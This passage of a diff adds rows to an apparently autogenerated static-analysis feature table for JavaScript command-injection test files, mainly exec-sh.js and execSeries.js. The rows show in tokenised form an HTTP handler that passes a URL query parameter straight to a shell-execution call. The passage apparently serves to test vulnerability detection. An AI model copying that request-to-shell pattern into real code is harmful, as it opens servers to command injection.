req.url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:29:19:31 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:29:19:31 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:29:19:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:29:19:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:29:19:31 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:34:19:37 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:40:19:44 | query | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:40:19:44 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:40:19:44 | query | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:40:19:44 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:40:19:44 | query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:46:19:49 | path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:46:19:49 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:46:19:49 | path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:46:19:49 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:46:19:49 | path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:10 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:10 | execSh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:10 | execSh | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:10 | execSh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:10 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | exceptional return of execSh(cmd) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | exceptional return of execSh(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | exceptional return of execSh(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | exceptional return of execSh(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | exceptional return of execSh(cmd) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | execSh(cmd) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | execSh(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | execSh(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | execSh(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:5:20:15 | execSh(cmd) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | CalleeFlexibleAccessPath | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:20:12:20:14 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:0 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | require | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:1:1:1 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:8 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:8 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec = ... ').exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec = ... ').exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:5:1:40 | exec = ... ').exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:18 | require | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:18 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | exceptional return of require ... ocess') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | exceptional return of require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | require ... ocess') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:40 | require ... ').exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:40 | require ... ').exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:40 | require ... ').exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:20:1:34 | 'child_process' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:37:1:40 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:37:1:40 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:37:1:40 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:0 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:0 | this | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:0 | this | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | iterator | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | iterator | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:3:1 | iterator | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | 'arguments' object of function asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | 'arguments' object of function asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | 'arguments' object of function asyncEach | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | 'arguments' object of function asyncEach | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | 'arguments' object of function asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | exceptional return of function asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | exceptional return of function asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | exceptional return of function asyncEach | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | exceptional return of function asyncEach | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | exceptional return of function asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | functio ... })();\\n} | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | functio ... })();\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | functio ... })();\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | return of function asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | return of function asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | return of function asyncEach | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | return of function asyncEach | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:1:11:1 | return of function asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:10:3:18 | asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:20:3:22 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:3:25:3:32 | iterator | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:7 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i = 0 | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i = 0 | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i = 0 | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i = 0 | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:7:4:11 | i = 0 | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:11:4:11 | 0 | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:11:4:11 | 0 | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:11:4:11 | 0 | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:11:4:11 | 0 | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:4:11:4:11 | 0 | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:4 | (functi ... );\\n }) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:4 | (functi ... );\\n }) | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:4 | (functi ... );\\n }) | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:4 | (functi ... );\\n }) | enclosingFunctionName | asyncEach | +| 